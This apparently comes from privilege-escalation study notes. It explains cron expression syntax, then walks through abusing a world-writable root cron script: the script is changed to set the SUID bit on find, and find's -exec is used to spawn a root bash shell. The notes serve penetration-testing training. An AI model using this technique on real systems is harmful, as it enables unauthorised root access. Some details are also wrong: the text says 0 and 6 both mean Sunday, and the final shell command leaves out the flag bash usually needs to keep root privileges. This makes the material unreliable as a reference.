4.4.3 CronJobs

CronJobs

What is a CronJob?

CronJobs is a scheduled task or command that is automatically executed at specified intervals on a Unix-like operating system. The name "cron" comes from the Greek word "chronos," meaning time, and it is a time-based job scheduler in Unix-like operating systems.

Cron jobs are commonly used for automating repetitive tasks, system maintenance, or any task that needs to be performed at specific intervals. These tasks can include things like running scripts, backing up data, updating databases, or any other routine maintenance.

The schedule for a cron job is defined using a cron expression, which consists of five fields representing the minute, hour, day of the month, month, and day of the week. For example, a cron expression like "0 2 * * *" would indicate a job that runs at 2:00 AM every day.

Here is a breakdown of the cron expression fields:

1st *: Minute (0 - 59)

2nd *: Hour (0 - 23)

3rd *: Day of the month (1 - 31)

4th *: Month (1 - 12)

5th *: Day of the week (0 - 6, where both 0 and 6 represent Sunday).

After this there's a username (root) and path of command to execute (program path) and eventually an argument (arg1).

Example of CronJob definition

This is an example of CronJob in python language that execute a bash command on the system:

#!/usr/bin/env python
import os
import sys
try:
   os.system('rm -r /home/new_user/disk_clean* ')
except:
    sys.exit()

E.g. considering that CronJob has maximum permissions (777):

*/1 *   * * *   root    /home/new_user/disk_cleaner.py

we can modify python script cronjob and execute command to escalate privilege for a normal user:

os.system('rm -r /home/new_user/disk_clean* ') -> 'chmod u+s /usr/bin/find '

waiting 1 minute new_user obtain SUID permissions for find command (ls -l /usr/bin/find) and executing find command we'll gain root privilege:

find /home -exec "/bin/bash" \;